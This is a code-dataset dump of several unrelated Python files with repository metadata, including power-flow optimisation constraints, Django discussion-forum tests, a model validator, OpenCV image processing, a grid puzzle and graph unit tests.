m.c19 = Constraint(expr=-(1.18760437929115*m.x9**2 - 1.18760437929115*m.x9*m.x8*cos(m.x54 - m.x53) + 5.97513453330859*
m.x9*m.x8*sin(m.x54 - m.x53))*m.b63 + m.x27 == 0)
m.c20 = Constraint(expr=-(17.0648464163823*m.x3**2 - 17.0648464163823*m.x3*m.x6*cos(m.x48 - m.x51))*m.b55 + m.x28 == 0)
m.c21 = Constraint(expr=-(17.0648464163823*m.x6**2 - 17.0648464163823*m.x6*m.x3*cos(m.x51 - m.x48))*m.b55 + m.x29 == 0)
m.c22 = Constraint(expr=-(13.6234785969084*m.x7**2 - 13.6979785969084*m.x7*m.x8*cos(m.x52 - m.x53) - 1.61712247324614*
m.x7*m.x8*sin(m.x52 - m.x53))*m.b56 + m.x30 == 0)
m.c23 = Constraint(expr=-(13.6234785969084*m.x8**2 - 13.6979785969084*m.x8*m.x7*cos(m.x53 - m.x52) - 1.61712247324614*
m.x8*m.x7*sin(m.x53 - m.x52))*m.b56 + m.x31 == 0)
m.c24 = Constraint(expr=-(5.40924496236153*m.x5**2 - 5.58824496236153*m.x5*m.x6*cos(m.x50 - m.x51) - 1.28200913842411*
m.x5*m.x6*sin(m.x50 - m.x51))*m.b57 + m.x32 == 0)
m.c25 = Constraint(expr=-(5.40924496236153*m.x6**2 - 5.58824496236153*m.x6*m.x5*cos(m.x51 - m.x50) - 1.28200913842411*
m.x6*m.x5*sin(m.x51 - m.x50))*m.b57 + m.x33 == 0)
m.c26 = Constraint(expr=-(9.67977042636317*m.x6**2 - 9.78427042636317*m.x6*m.x7*cos(m.x51 - m.x52) - 1.1550874808901*
m.x6*m.x7*sin(m.x51 - m.x52))*m.b58 + m.x34 == 0)
m.c27 = Constraint(expr=-(9.67977042636317*m.x7**2 - 9.78427042636317*m.x7*m.x6*cos(m.x52 - m.x51) - 1.1550874808901*
m.x7*m.x6*sin(m.x52 - m.x51))*m.b58 + m.x35 == 0)
m.c28 = Constraint(expr=-(16*m.x8**2 - 16*m.x8*m.x2*cos(m.x53 - m.x47))*m.b59 + m.x36 == 0)
m.c29 = Constraint(expr=-(16*m.x2**2 - 16*m.x2*m.x8*cos(m.x47 - m.x53))*m.b59 + m.x37 == 0)
m.c30 = Constraint(expr=-(10.4316820518679*m.x4**2 - 10.5106820518679*m.x4*m.x5*cos(m.x49 - m.x50) - 1.94219124871473*
m.x4*m.x5*sin(m.x49 - m.x50))*m.b60 + m.x38 == 0)
m.c31 = Constraint(expr=-(10.4316820518679*m.x5**2 - 10.5106820518679*m.x5*m.x4*cos(m.x50 - m.x49) - 1.94219124871473*
m.x5*m.x4*sin(m.x50 - m.x49))*m.b60 + m.x39 == 0)
m.c32 = Constraint(expr=-(17.3611111111111*m.x1**2 - 17.3611111111111*m.x1*m.x4*cos(m.x46 - m.x49))*m.b61 + m.x40 == 0)
m.c33 = Constraint(expr=-(17.3611111111111*m.x4**2 - 17.3611111111111*m.x4*m.x1*cos(m.x49 - m.x46))*m.b61 + m.x41 == 0)
m.c34 = Constraint(expr=-(11.5160955631399*m.x9**2 - 11.6040955631399*m.x9*m.x4*cos(m.x54 - m.x49) - 1.36518771331058*
m.x9*m.x4*sin(m.x54 - m.x49))*m.b62 + m.x42 == 0)
m.c35 = Constraint(expr=-(11.5160955631399*m.x4**2 - 11.6040955631399*m.x4*m.x9*cos(m.x49 - m.x54) - 1.36518771331058*
m.x4*m.x9*sin(m.x49 - m.x54))*m.b62 + m.x43 == 0)
m.c36 = Constraint(expr=-(5.82213453330859*m.x8**2 - 5.97513453330859*m.x8*m.x9*cos(m.x53 - m.x54) - 1.18760437929115*
m.x8*m.x9*sin(m.x53 - m.x54))*m.b63 + m.x44 == 0)
m.c37 = Constraint(expr=-(5.82213453330859*m.x9**2 - 5.97513453330859*m.x9*m.x8*cos(m.x54 - m.x53) - 1.18760437929115*
m.x9*m.x8*sin(m.x54 - m.x53))*m.b63 + m.x45 == 0)
m.c38 = Constraint(expr=m.x10**2 + m.x28**2 <= 9)
m.c39 = Constraint(expr=m.x11**2 + m.x29**2 <= 9)
m.c40 = Constraint(expr=m.x12**2 + m.x30**2 <= 6.25)
m.c41 = Constraint(expr=m.x13**2 + m.x31**2 <= 6.25)
m.c42 = Constraint(expr=m.x14**2 + m.x32**2 <= 2.25)
m.c43 = Constraint(expr=m.x15**2 + m.x33**2 <= 2.25)
m.c44 = Constraint(expr=m.x16**2 + m.x34**2 <= 2.25)
m.c45 = Constraint(expr=m.x17**2 + m.x35**2 <= 2.25)
m.c46 = Constraint(expr=m.x18**2 + m.x36**2 <= 6.25)
m.c47 = Constraint(expr=m.x19**2 + m.x37**2 <= 6.25)
m.c48 = Constraint(expr=m.x20**2 + m.x38**2 <= 6.25)
m.c49 = Constraint(expr=m.x21**2 + m.x39**2 <= 6.25)
m.c50 = Constraint(expr=m.x22**2 + m.x40**2 <= 6.25)
m.c51 = Constraint(expr=m.x23**2 + m.x41**2 <= 6.25)
m.c52 = Constraint(expr=m.x24**2 + m.x42**2 <= 6.25)
m.c53 = Constraint(expr=m.x25**2 + m.x43**2 <= 6.25)
m.c54 = Constraint(expr=m.x26**2 + m.x44**2 <= 6.25)
m.c55 = Constraint(expr=m.x27**2 + m.x45**2 <= 6.25)
m.c56 = Constraint(expr= m.x64 <= 2.5)
m.c57 = Constraint(expr= m.x65 <= 3)
m.c58 = Constraint(expr= m.x66 <= 2.7)
m.c59 = Constraint(expr= m.x64 >= 0.1)
m.c60 = Constraint(expr= m.x65 >= 0.1)
m.c61 = Constraint(expr= m.x66 >= 0.1)
m.c62 = Constraint(expr= m.x67 <= 3)
m.c63 = Constraint(expr= m.x68 <= 3)
m.c64 = Constraint(expr= m.x69 <= 3)
m.c65 = Constraint(expr= m.x67 >= -3)
m.c66 = Constraint(expr= m.x68 >= -3)
m.c67 = Constraint(expr= m.x69 >= -3)
m.c68 = Constraint(expr= m.x1 <= 1.1)
m.c69 = Constraint(expr= m.x2 <= 1.1)
m.c70 = Constraint(expr= m.x3 <= 1.1)
m.c71 = Constraint(expr= m.x4 <= 1.1)
m.c72 = Constraint(expr= m.x5 <= 1.1)
m.c73 = Constraint(expr= m.x6 <= 1.1)
m.c74 = Constraint(expr= m.x7 <= 1.1)
m.c75 = Constraint(expr= m.x8 <= 1.1)
m.c76 = Constraint(expr= m.x9 <= 1.1)
m.c77 = Constraint(expr= m.x1 >= 0.9)
m.c78 = Constraint(expr= m.x2 >= 0.9)
m.c79 = Constraint(expr= m.x3 >= 0.9)
m.c80 = Constraint(expr= m.x4 >= 0.9)
m.c81 = Constraint(expr= m.x5 >= 0.9)
m.c82 = Constraint(expr= m.x6 >= 0.9)
m.c83 = Constraint(expr= m.x7 >= 0.9)
m.c84 = Constraint(expr= m.x8 >= 0.9)
m.c85 = Constraint(expr= m.x9 >= 0.9)
m.c86 = Constraint(expr= m.x48 - m.x51 >= -0.26)
m.c87 = Constraint(expr= - m.x48 + m.x51 >= -0.26)
m.c88 = Constraint(expr= m.x52 - m.x53 >= -0.26)
m.c89 = Constraint(expr= - m.x52 + m.x53 >= -0.26)
m.c90 = Constraint(expr= m.x50 - m.x51 >= -0.26)
m.c91 = Constraint(expr= - m.x50 + m.x51 >= -0.26)
m.c92 = Constraint(expr= m.x51 - m.x52 >= -0.26)
m.c93 = Constraint(expr= - m.x51 + m.x52 >= -0.26)
m.c94 = Constraint(expr= - m.x47 + m.x53 >= -0.26)
m.c95 = Constraint(expr= m.x47 - m.x53 >= -0.26)
m.c96 = Constraint(expr= m.x49 - m.x50 >= -0.26)
m.c97 = Constraint(expr= - m.x49 + m.x50 >= -0.26)
m.c98 = Constraint(expr= m.x46 - m.x49 >= -0.26)
m.c99 = Constraint(expr= - m.x46 + m.x49 >= -0.26)
m.c100 = Constraint(expr= - m.x49 + m.x54 >= -0.26)
m.c101 = Constraint(expr= m.x49 - m.x54 >= -0.26)
m.c102 = Constraint(expr= m.x53 - m.x54 >= -0.26)
m.c103 = Constraint(expr= - m.x53 + m.x54 >= -0.26)
m.c104 = Constraint(expr= m.x48 - m.x51 <= 0.26)
m.c105 = Constraint(expr= - m.x48 + m.x51 <= 0.26)
m.c106 = Constraint(expr= m.x52 - m.x53 <= 0.26)
m.c107 = Constraint(expr= - m.x52 + m.x53 <= 0.26)
m.c108 = Constraint(expr= m.x50 - m.x51 <= 0.26)
m.c109 = Constraint(expr= - m.x50 + m.x51 <= 0.26)
m.c110 = Constraint(expr= m.x51 - m.x52 <= 0.26)
m.c111 = Constraint(expr= - m.x51 + m.x52 <= 0.26)
m.c112 = Constraint(expr= - m.x47 + m.x53 <= 0.26)
m.c113 = Constraint(expr= m.x47 - m.x53 <= 0.26)
m.c114 = Constraint(expr= m.x49 - m.x50 <= 0.26)
m.c115 = Constraint(expr= - m.x49 + m.x50 <= 0.26)
m.c116 = Constraint(expr= m.x46 - m.x49 <= 0.26)
m.c117 = Constraint(expr= - m.x46 + m.x49 <= 0.26)
m.c118 = Constraint(expr= - m.x49 + m.x54 <= 0.26)
m.c119 = Constraint(expr= m.x49 - m.x54 <= 0.26)
m.c120 = Constraint(expr= m.x53 - m.x54 <= 0.26)
m.c121 = Constraint(expr= - m.x53 + m.x54 <= 0.26)
m.c122 = Constraint(expr= m.x46 == 0)
m.c123 = Constraint(expr= m.x22 - m.x64 == 0)
m.c124 = Constraint(expr= m.x19 - m.x65 == 0)
m.c125 = Constraint(expr= m.x10 - m.x66 == 0)
m.c126 = Constraint(expr= m.x40 - m.x67 == 0)
m.c127 = Constraint(expr= m.x37 - m.x68 == 0)
m.c128 = Constraint(expr= m.x28 - m.x69 == 0)
m.c129 = Constraint(expr= m.x20 + m.x23 + m.x25 == 0)
m.c130 = Constraint(expr= m.x14 + m.x21 == -0.9)
m.c131 = Constraint(expr= m.x11 + m.x15 + m.x16 == 0)
m.c132 = Constraint(expr= m.x12 + m.x17 == -1)
m.c133 = Constraint(expr= m.x13 + m.x18 + m.x26 == 0)
m.c134 = Constraint(expr= m.x24 + m.x27 == -1.25)
m.c135 = Constraint(expr= m.x38 + m.x41 + m.x43 == 0)
m.c136 = Constraint(expr= m.x32 + m.x39 == -0.3)
m.c137 = Constraint(expr= m.x29 + m.x33 + m.x34 == 0)
m.c138 = Constraint(expr= m.x30 + m.x35 == -0.35)
m.c139 = Constraint(expr= m.x31 + m.x36 + m.x44 == 0)
m.c140 = Constraint(expr= m.x42 + m.x45 == -0.5)
| 0 | 0 | 0 |
4ee8509f03c8f5ebeb21b108dd00b217afcaa269 | 8,819 | py | Python | academicstoday_project/teacher/tests/test_discussion.py | LeeDoona/EasyGrading | 8a3b7a95e328a5b710bd98934dcde7556731bd72 | [
"Apache-2.0"
] | 146 | 2017-02-04T11:14:50.000Z | 2021-12-30T20:54:50.000Z | academicstoday_project/teacher/tests/test_discussion.py | LeeDoona/EasyGrading | 8a3b7a95e328a5b710bd98934dcde7556731bd72 | [
"Apache-2.0"
] | 139 | 2015-02-21T21:40:34.000Z | 2016-02-20T13:34:25.000Z | academicstoday_project/teacher/tests/test_discussion.py | topsit143/acda | c2a20ffd1dcf8668d1fe401d114d32d9e686f1fd | [
"Apache-2.0"
] | 88 | 2017-01-20T20:32:44.000Z | 2022-02-07T05:32:44.000Z | # Django & Python
from django.core.urlresolvers import resolve
from django.http import HttpRequest
from django.http import QueryDict
from django.test import TestCase
from django.test import Client
from django.contrib.auth.models import User
from django.contrib.auth import authenticate, login, logout
from django.contrib.auth.decorators import login_required
import json
from account.models import Teacher
from registrar.models import Course
from registrar.models import CourseDiscussionPost
from registrar.models import CourseDiscussionThread
from teacher.views import discussion
# Contants
TEST_USER_EMAIL = "ledo@gah.com"
TEST_USER_USERNAME = "Ledo"
TEST_USER_PASSWORD = "ContinentalUnion"
TEST_USER_EMAIL2 = "whalesquid@hideauze.com"
TEST_USER_USERNAME2 = "whalesquid"
TEST_USER_PASSWORD2 = "Evolvers"
# Notes:
# https://docs.djangoproject.com/en/1.7/topics/testing/tools/#assertions
# Create your tests here. | 39.022124 | 86 | 0.659372 | # Django & Python
from django.core.urlresolvers import resolve
from django.http import HttpRequest
from django.http import QueryDict
from django.test import TestCase
from django.test import Client
from django.contrib.auth.models import User
from django.contrib.auth import authenticate, login, logout
from django.contrib.auth.decorators import login_required
import json
from account.models import Teacher
from registrar.models import Course
from registrar.models import CourseDiscussionPost
from registrar.models import CourseDiscussionThread
from teacher.views import discussion
# Contants
TEST_USER_EMAIL = "ledo@gah.com"
TEST_USER_USERNAME = "Ledo"
TEST_USER_PASSWORD = "ContinentalUnion"
TEST_USER_EMAIL2 = "whalesquid@hideauze.com"
TEST_USER_USERNAME2 = "whalesquid"
TEST_USER_PASSWORD2 = "Evolvers"
# Notes:
# https://docs.djangoproject.com/en/1.7/topics/testing/tools/#assertions
# Create your tests here.
class DiscussionTestCase(TestCase):
def tearDown(self):
courses = Course.objects.all()
for course in courses:
course.delete()
User.objects.all().delete()
def setUp(self):
# Create our Trudy user.
User.objects.create_user(
email=TEST_USER_EMAIL2,
username=TEST_USER_USERNAME2,
password=TEST_USER_PASSWORD2
)
user = User.objects.get(email=TEST_USER_EMAIL2)
teacher = Teacher.objects.create(user=user)
# Create our Teacher.
User.objects.create_user(
email=TEST_USER_EMAIL,
username=TEST_USER_USERNAME,
password=TEST_USER_PASSWORD
)
user = User.objects.get(email=TEST_USER_EMAIL)
teacher = Teacher.objects.create(user=user)
# Create a test course
Course.objects.create(
id=1,
title="Comics Book Course",
sub_title="The definitive course on comics!",
category="",
teacher=teacher,
)
course = Course.objects.get(id=1)
user = User.objects.get(email=TEST_USER_EMAIL)
CourseDiscussionThread.objects.create(
thread_id=1,
title="Glory...",
text="Glory to the Galactic Alliance of Humankind!",
user=user,
course=course,
)
CourseDiscussionPost.objects.create(
post_id=1,
user=user,
title='Hideazue...',
text='We will spread the domain of the living throughout the universe!'
)
thread = CourseDiscussionThread.objects.get(thread_id=1)
post = CourseDiscussionPost.objects.get(post_id=1)
thread.posts.add(post)
def get_logged_in_client(self):
client = Client()
client.login(
username=TEST_USER_USERNAME,
password=TEST_USER_PASSWORD
)
return client
def get_logged_in_trudy_client(self):
client = Client()
client.login(
username=TEST_USER_USERNAME2,
password=TEST_USER_PASSWORD2
)
return client
def test_url_resolves_to_discussion_page_view(self):
found = resolve('/teacher/course/1/discussion')
self.assertEqual(found.func, discussion.discussion_page)
def test_discussion_page_without_thread(self):
CourseDiscussionThread.objects.get(
thread_id=1
).delete()
client = self.get_logged_in_client()
response = client.post('/teacher/course/1/discussion')
self.assertEqual(response.status_code, 200)
self.assertIn(b'Comics Book Course',response.content)
def test_discussion_page_with_thread(self):
client = self.get_logged_in_client()
response = client.post('/teacher/course/1/discussion')
self.assertEqual(response.status_code, 200)
self.assertIn(b'Comics Book Course',response.content)
self.assertIn(b'ajax_discussions_table',response.content)
def test_threads_table_without_thread(self):
CourseDiscussionThread.objects.get(
thread_id=1
).delete()
client = self.get_logged_in_client()
response = client.post('/teacher/course/1/discussions_table')
self.assertEqual(response.status_code, 200)
def test_threads_table_with_thread(self):
client = self.get_logged_in_client()
response = client.post('/teacher/course/1/discussions_table')
self.assertEqual(response.status_code, 200)
self.assertIn(b'Glory...',response.content)
def test_new_thread_modal(self):
client = self.get_logged_in_client()
response = client.post('/teacher/course/1/new_thread')
self.assertEqual(response.status_code, 200)
self.assertIn(b'new_thread_modal',response.content)
def test_insert_thread(self):
CourseDiscussionThread.objects.get(
thread_id=1
).delete()
kwargs = {'HTTP_X_REQUESTED_WITH':'XMLHttpRequest'}
client = self.get_logged_in_client()
response = client.post('/teacher/course/1/insert_thread',{
'title': 'Hideazue...',
'text': 'We will spread the domain of the living throughout the universe!'
}, **kwargs)
json_string = response.content.decode(encoding='UTF-8')
array = json.loads(json_string)
self.assertEqual(response.status_code, 200)
self.assertEqual(array['message'], 'submitted')
self.assertEqual(array['status'], 'success')
def test_delete_thread_with_thread_and_correct_user(self):
kwargs = {'HTTP_X_REQUESTED_WITH':'XMLHttpRequest'}
client = self.get_logged_in_client()
response = client.post('/teacher/course/1/delete_thread',{
'thread_id': 1,
}, **kwargs)
json_string = response.content.decode(encoding='UTF-8')
array = json.loads(json_string)
self.assertEqual(array['status'], 'success')
self.assertEqual(array['message'], 'thread was deleted')
def test_delete_thread_with_empty(self):
CourseDiscussionThread.objects.all().delete()
kwargs = {'HTTP_X_REQUESTED_WITH':'XMLHttpRequest'}
client = self.get_logged_in_client()
response = client.post('/teacher/course/1/delete_thread',{
'thread_id': 1,
}, **kwargs)
json_string = response.content.decode(encoding='UTF-8')
array = json.loads(json_string)
self.assertEqual(array['status'], 'failed')
self.assertEqual(array['message'], 'record does not exist')
def test_delete_thread_with_thread_and_incorrect_user(self):
kwargs = {'HTTP_X_REQUESTED_WITH':'XMLHttpRequest'}
client = self.get_logged_in_trudy_client()
response = client.post('/teacher/course/1/delete_thread',{
'thread_id': 1,
}, **kwargs)
json_string = response.content.decode(encoding='UTF-8')
array = json.loads(json_string)
self.assertEqual(array['status'], 'failed')
self.assertEqual(array['message'], 'unauthorized deletion')
def test_url_resolves_to_posts_page_view(self):
found = resolve('/teacher/course/1/thread/1')
self.assertEqual(found.func, discussion.posts_page)
def test_posts_page(self):
client = self.get_logged_in_client()
response = client.post('/teacher/course/1/thread/1')
self.assertEqual(response.status_code, 200)
self.assertIn(b'Comics Book Course',response.content)
self.assertIn(b'ajax_discussion_table',response.content)
def test_post_table(self):
client = self.get_logged_in_client()
response = client.post('/teacher/course/1/thread/1/posts_table')
self.assertEqual(response.status_code, 200)
self.assertIn(b'Hideazue...',response.content)
def test_new_post_modal(self):
client = self.get_logged_in_client()
response = client.post('/teacher/course/1/thread/1/new_post')
self.assertEqual(response.status_code, 200)
self.assertIn(b'new_post_modal',response.content)
def test_insert_post(self):
CourseDiscussionPost.objects.get(
post_id=1
).delete()
kwargs = {'HTTP_X_REQUESTED_WITH':'XMLHttpRequest'}
client = self.get_logged_in_client()
response = client.post('/teacher/course/1/thread/1/insert_post',{
'title': 'Hideazue...',
'text': 'We will spread the domain of the living throughout the universe!'
}, **kwargs)
json_string = response.content.decode(encoding='UTF-8')
array = json.loads(json_string)
self.assertEqual(response.status_code, 200)
self.assertEqual(array['message'], 'submitted')
self.assertEqual(array['status'], 'success') | 7,335 | 14 | 554 |
d146f86fe4b08ed4d48239b293aa2f2b80b2c8eb | 1,239 | py | Python | rebase/validators/nested_validator.py | dciccale/rebase | e218bde43a31cb8b269733d262e978e4872f969f | [
"Apache-2.0"
] | 15 | 2018-07-06T13:40:27.000Z | 2021-08-05T21:33:31.000Z | rebase/validators/nested_validator.py | dciccale/rebase | e218bde43a31cb8b269733d262e978e4872f969f | [
"Apache-2.0"
] | 1 | 2021-04-01T10:24:32.000Z | 2021-04-01T10:24:32.000Z | rebase/validators/nested_validator.py | dciccale/rebase | e218bde43a31cb8b269733d262e978e4872f969f | [
"Apache-2.0"
] | 5 | 2018-07-06T13:40:31.000Z | 2020-10-28T19:51:03.000Z | """This file is part of the trivago/rebase library.
# Copyright (c) 2018 trivago N.V.
# License: Apache 2.0
# Source: https://github.com/trivago/rebase
# Version: 1.2.2
# Python Version: 3.6
# Author: Yuv Joodhisty <yuvrajsingh.joodhisty@trivago.com>
"""
from rebase.core import Model, Validator
| 29.5 | 68 | 0.572236 | """This file is part of the trivago/rebase library.
# Copyright (c) 2018 trivago N.V.
# License: Apache 2.0
# Source: https://github.com/trivago/rebase
# Version: 1.2.2
# Python Version: 3.6
# Author: Yuv Joodhisty <yuvrajsingh.joodhisty@trivago.com>
"""
from rebase.core import Model, Validator
class NestedValidator(Validator):
def properties(self):
return {
**super().properties(),
'required': True,
}
def validate(self, value):
if not super().validate(value):
return False
is_valid = True
if isinstance(value, Model) and not value.validate():
is_valid = False
self.errors.append(value.get_errors())
elif isinstance(value, dict):
for k, v in value.items():
if isinstance(v, Model) and not v.validate():
is_valid = False
self.errors.append({k: v.get_errors()})
elif isinstance(value, list) or isinstance(value, set):
for v in value:
if isinstance(v, Model) and not v.validate():
is_valid = False
self.errors.append({v.get_id(): v.get_errors()})
return is_valid
| 852 | 12 | 76 |
05b958c3e5ef7b84bf7c6a9d4484c6eb9da5ea59 | 1,071 | py | Python | TemasC/try.py | axsaenz/Alvin | 9afa5a5a8ad3e7d703818d867df3630042293d49 | [
"MIT"
] | null | null | null | TemasC/try.py | axsaenz/Alvin | 9afa5a5a8ad3e7d703818d867df3630042293d49 | [
"MIT"
] | null | null | null | TemasC/try.py | axsaenz/Alvin | 9afa5a5a8ad3e7d703818d867df3630042293d49 | [
"MIT"
] | null | null | null | import numpy as np
import cv2
import camera
import images
objCamera = camera.Camera(camera_port = 1, resolution = 1)
img = objCamera.take_photo()
gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)
cv2.imshow('Gray', gray)
cv2.waitKey(0)
gray_blur = images.gaussian(gray, 11)
cv2.imshow('Gaussian', gray_blur)
cv2.waitKey(0)
gray_canny = images.canny(gray_blur, 100, 130)
cv2.imshow('Canny', gray_canny)
cv2.waitKey(0)
imshape = img.shape
vertix0 = (0, imshape[0])
vertix1 = (0, int(333 * imshape[0] / 480))
vertix2 = (int(200 * imshape[1] / 640), int(65 * imshape[0] / 480))
vertix3 = (int(430 * imshape[1] / 640), int(65 * imshape[0] / 480))
vertix4 = (imshape[1], int(333 * imshape[0] / 480))
vertix5 = (imshape[1], imshape[0])
vertices = np.array([[vertix0, vertix1, vertix2, vertix3, vertix4, vertix5]], dtype=np.int32)
region = images.region_of_interest(gray_canny, vertices)
cv2.imshow('Region', region)
cv2.waitKey(0)
hough = images.hough(img, region, 0, 0, 120)
cv2.imshow('Hough', hough)
cv2.waitKey(0)
camera.save_photo('hough', hough)
cv2.destroyAllWindows() | 27.461538 | 93 | 0.709617 | import numpy as np
import cv2
import camera
import images
objCamera = camera.Camera(camera_port = 1, resolution = 1)
img = objCamera.take_photo()
gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)
cv2.imshow('Gray', gray)
cv2.waitKey(0)
gray_blur = images.gaussian(gray, 11)
cv2.imshow('Gaussian', gray_blur)
cv2.waitKey(0)
gray_canny = images.canny(gray_blur, 100, 130)
cv2.imshow('Canny', gray_canny)
cv2.waitKey(0)
imshape = img.shape
vertix0 = (0, imshape[0])
vertix1 = (0, int(333 * imshape[0] / 480))
vertix2 = (int(200 * imshape[1] / 640), int(65 * imshape[0] / 480))
vertix3 = (int(430 * imshape[1] / 640), int(65 * imshape[0] / 480))
vertix4 = (imshape[1], int(333 * imshape[0] / 480))
vertix5 = (imshape[1], imshape[0])
vertices = np.array([[vertix0, vertix1, vertix2, vertix3, vertix4, vertix5]], dtype=np.int32)
region = images.region_of_interest(gray_canny, vertices)
cv2.imshow('Region', region)
cv2.waitKey(0)
hough = images.hough(img, region, 0, 0, 120)
cv2.imshow('Hough', hough)
cv2.waitKey(0)
camera.save_photo('hough', hough)
cv2.destroyAllWindows() | 0 | 0 | 0 |
7f37e9263c431b73f9c514e50ece1dc69d7a3167 | 1,591 | py | Python | 03-Multidimensional-lists/alice_in_wonderland.py | nmoskova/Python-advanced | 007f496e868aa151e39d79446b055e76ffb2db95 | [
"MIT"
] | null | null | null | 03-Multidimensional-lists/alice_in_wonderland.py | nmoskova/Python-advanced | 007f496e868aa151e39d79446b055e76ffb2db95 | [
"MIT"
] | null | null | null | 03-Multidimensional-lists/alice_in_wonderland.py | nmoskova/Python-advanced | 007f496e868aa151e39d79446b055e76ffb2db95 | [
"MIT"
] | null | null | null |
size = int(input())
matrix = []
alice_row, alice_col = 0, 0
for r in range(size):
matrix.append(input().split())
for c in range(size):
if matrix[r][c] == "A":
alice_row, alice_col = r, c
matrix[alice_row][alice_col] = '*'
alice_collected_enough_tea = False
tea = 0
current_row, current_col = alice_row, alice_col
while True:
command = input()
current_row, current_col = get_position(command, current_row, current_col)
if not check_valid_index(current_row, current_col, size):
break
if matrix[current_row][current_col] == "R":
matrix[current_row][current_col] = "*"
break
elif matrix[current_row][current_col] == ".":
matrix[current_row][current_col] = "*"
continue
elif matrix[current_row][current_col] == "*":
continue
else:
tea += int(matrix[current_row][current_col])
matrix[current_row][current_col] = "*"
if tea >= 10:
alice_collected_enough_tea = True
break
if alice_collected_enough_tea:
print("She did it! She went to the party.")
else:
print("Alice didn't make it to the tea party.")
[print(' '.join(row)) for row in matrix] | 26.966102 | 78 | 0.623507 | def get_position(command: str, row: int, col: int):
if command == "up":
return row - 1, col
elif command == "down":
return row + 1, col
elif command == "left":
return row, col - 1
elif command == "right":
return row, col + 1
def check_valid_index(next_row, next_col, size):
return next_row in range(size) and next_col in range(size)
size = int(input())
matrix = []
alice_row, alice_col = 0, 0
for r in range(size):
matrix.append(input().split())
for c in range(size):
if matrix[r][c] == "A":
alice_row, alice_col = r, c
matrix[alice_row][alice_col] = '*'
alice_collected_enough_tea = False
tea = 0
current_row, current_col = alice_row, alice_col
while True:
command = input()
current_row, current_col = get_position(command, current_row, current_col)
if not check_valid_index(current_row, current_col, size):
break
if matrix[current_row][current_col] == "R":
matrix[current_row][current_col] = "*"
break
elif matrix[current_row][current_col] == ".":
matrix[current_row][current_col] = "*"
continue
elif matrix[current_row][current_col] == "*":
continue
else:
tea += int(matrix[current_row][current_col])
matrix[current_row][current_col] = "*"
if tea >= 10:
alice_collected_enough_tea = True
break
if alice_collected_enough_tea:
print("She did it! She went to the party.")
else:
print("Alice didn't make it to the tea party.")
[print(' '.join(row)) for row in matrix] | 341 | 0 | 45 |
e87e4331c329b0e493efb43ebb9bed1ab2eadf77 | 349 | py | Python | common/helpers.py | gtsiokos/diogenis | c83d4dac26df68bbbf897c48a5552ea9c9ede9c2 | [
"BSD-3-Clause"
] | 1 | 2019-08-16T13:47:46.000Z | 2019-08-16T13:47:46.000Z | common/helpers.py | gtsiokos/diogenis | c83d4dac26df68bbbf897c48a5552ea9c9ede9c2 | [
"BSD-3-Clause"
] | null | null | null | common/helpers.py | gtsiokos/diogenis | c83d4dac26df68bbbf897c48a5552ea9c9ede9c2 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# -*- coding: utf8 -*-
import hashlib
| 21.8125 | 69 | 0.590258 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# -*- coding: utf8 -*-
import hashlib
def get_hashed_id(object_id):
hashed_id = hashlib.sha256( str(object_id) )
return hashed_id.hexdigest()
def humanize_time(time):
t = (u"%d μ.μ." % (time-12) if time >= 13 else u"%d π.μ." % time)
if time == 12: t = u"%d μ.μ." % time
return t
| 223 | 0 | 46 |
1bd903dfb9b3c865b70e9022d40b1ef39d839bc9 | 1,118 | py | Python | scripts/create_sample_images.py | JColl88/sdc1-solution-binder | 4a932b319bd26d66a4230de5014d53339fa85da9 | [
"BSD-3-Clause"
] | null | null | null | scripts/create_sample_images.py | JColl88/sdc1-solution-binder | 4a932b319bd26d66a4230de5014d53339fa85da9 | [
"BSD-3-Clause"
] | null | null | null | scripts/create_sample_images.py | JColl88/sdc1-solution-binder | 4a932b319bd26d66a4230de5014d53339fa85da9 | [
"BSD-3-Clause"
] | null | null | null | import os
from pathlib import Path
from ska.sdc1.utils.image_utils import crop_to_training_area
# Challenge frequency bands
#
FREQS = [560, 1400, 9200]
full_image_dir = os.path.join("data", "images")
sample_image_dir = os.path.join("data", "sample_images")
if __name__ == "__main__":
"""
Helper script to generate small sample images from the full images, for testing.
These are 1.5 times the size (2.25 times the area) of the training area.
"""
for freq in FREQS:
try:
Path(sample_image_dir).mkdir(parents=True, exist_ok=True)
crop_to_training_area(
full_image_path(freq), sample_image_path(freq), freq, 1.5
)
except FileNotFoundError:
print(
"Could not find image {}; run download_data.sh first".format(
full_image_path(freq)
)
)
| 27.268293 | 84 | 0.646691 | import os
from pathlib import Path
from ska.sdc1.utils.image_utils import crop_to_training_area
# Challenge frequency bands
#
FREQS = [560, 1400, 9200]
full_image_dir = os.path.join("data", "images")
sample_image_dir = os.path.join("data", "sample_images")
def full_image_path(freq):
return os.path.join(full_image_dir, "{}mhz_1000h.fits".format(freq))
def sample_image_path(freq):
return os.path.join(sample_image_dir, "{}mhz_1000h_sample.fits".format(freq))
if __name__ == "__main__":
"""
Helper script to generate small sample images from the full images, for testing.
These are 1.5 times the size (2.25 times the area) of the training area.
"""
for freq in FREQS:
try:
Path(sample_image_dir).mkdir(parents=True, exist_ok=True)
crop_to_training_area(
full_image_path(freq), sample_image_path(freq), freq, 1.5
)
except FileNotFoundError:
print(
"Could not find image {}; run download_data.sh first".format(
full_image_path(freq)
)
)
| 167 | 0 | 46 |
783fca3a6ff9d0b95b21823f4aed095974cacc79 | 12,099 | py | Python | Tests/test_graph.py | dguan4/Airline | c461c5525f1739333bc5d969a87eabbd4ed9c855 | [
"MIT"
] | null | null | null | Tests/test_graph.py | dguan4/Airline | c461c5525f1739333bc5d969a87eabbd4ed9c855 | [
"MIT"
] | null | null | null | Tests/test_graph.py | dguan4/Airline | c461c5525f1739333bc5d969a87eabbd4ed9c855 | [
"MIT"
] | null | null | null | from unittest import TestCase
from graph import Graph
from edge import Edge
from vertex import Vertex
import collections as col
| 41.013559 | 226 | 0.592528 | from unittest import TestCase
from graph import Graph
from edge import Edge
from vertex import Vertex
import collections as col
class TestGraph(TestCase):
def test_add_from_json(self):
"""
Tests the add_from_json function in the Graph class
:return: true if all asserts pass
"""
graph = Graph()
graph.add_from_json('../Data/map_data.json')
self.assertIsInstance(graph, Graph)
self.assertIsInstance(graph.edges, dict)
self.assertIs(len(graph.edges), 48)
self.assertIs(len(graph.vertices), 48)
pass
def test_longest_flight(self):
"""
Tests the longest_flight function in the Graph class
:return: true if all tests pass
"""
graph = Graph()
